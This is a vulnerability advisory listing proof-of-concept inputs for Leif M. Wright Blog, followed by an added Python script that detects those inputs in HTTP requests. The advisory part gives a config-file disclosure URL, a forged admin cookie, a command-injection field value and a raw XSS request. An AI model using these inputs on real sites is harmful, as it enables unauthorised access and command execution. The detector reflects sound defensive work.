PoC/Exploit for Multiple flaws in Leif M. Wright Blog
Published Proof of Concept code - Multiple flaws in Leif M. Wright Blog.
- Description: Available
- Solution: Not available - check vendor's website
1. Sensitive Information Disclosure and Authentication Bypass
URL example:
http://[host]/cgi-bin/blog/blogconfig.txt
2. Cookie Authentication Bypass
Cookie: blogAdmin=true
3. Shell Command Execution
Sendmail: /bin/ls
4. 'Referer' and 'User-Agent' Cross-Site Scripting
GET /cgi-bin/blog/blog.cgi HTTP/1.0
Host: [host]
Referer: [XSS]
User-Agent: [XSS]
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

file=15-13.59.39.txt&year=2006&month=February&name=zz&comment=zzz&submit=Enter%20my%20comment
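
Added example (not part of the original advisory or of the blog's own code): a Python check that flags raw HTTP requests carrying the indicators from items 1, 2 and 4 above. The host name blog.example and the sample requests are constructed, and the function names and finding labels are hypothetical.

```python
import re

# Indicators taken from items 1, 2 and 4 of the advisory.
CONFIG_PATH = re.compile(r"/blogconfig\.txt(?:$|[?#])", re.I)
ADMIN_COOKIE = re.compile(r"(?:^|;)\s*blogAdmin\s*=\s*true\s*(?:;|$)")
MARKUP = re.compile(r"[<>]|%3c|%3e", re.I)

def parse_request(raw):
    """Split a raw HTTP request into (target, headers); names lower-cased."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = head.split("\n")
    parts = lines[0].split()
    target = parts[1] if len(parts) >= 2 else ""
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return target, headers

def audit_request(raw):
    """Return finding labels for one raw request (empty list = nothing flagged)."""
    target, headers = parse_request(raw)
    findings = []
    if CONFIG_PATH.search(target):
        findings.append("config-file-request")      # item 1
    if ADMIN_COOKIE.search(headers.get("cookie", "")):
        findings.append("admin-cookie-presented")   # item 2
    for name in ("referer", "user-agent"):           # item 4
        if MARKUP.search(headers.get(name, "")):
            findings.append("markup-in-" + name)
    return findings

# Constructed sample requests (not captured traffic); blog.example is a placeholder.
SAMPLES = [
    "GET /cgi-bin/blog/blogconfig.txt HTTP/1.0\r\nHost: blog.example\r\n\r\n",
    "GET /cgi-bin/blog/blog.cgi HTTP/1.0\r\nHost: blog.example\r\n"
    "Cookie: lang=en; blogAdmin=true\r\n\r\n",
    "GET /cgi-bin/blog/blog.cgi HTTP/1.0\r\nHost: blog.example\r\n"
    "Referer: <i>test</i>\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET /cgi-bin/blog/blog.cgi HTTP/1.0\r\nHost: blog.example\r\n"
    "Referer: http://blog.example/\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
]

if __name__ == "__main__":
    for raw in SAMPLES:
        print(raw.split("\r\n", 1)[0], "->", audit_request(raw))
```

The admin-cookie finding marks every request that presents the cookie, so it needs to be correlated with known administrator sessions before it is treated as an alert.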


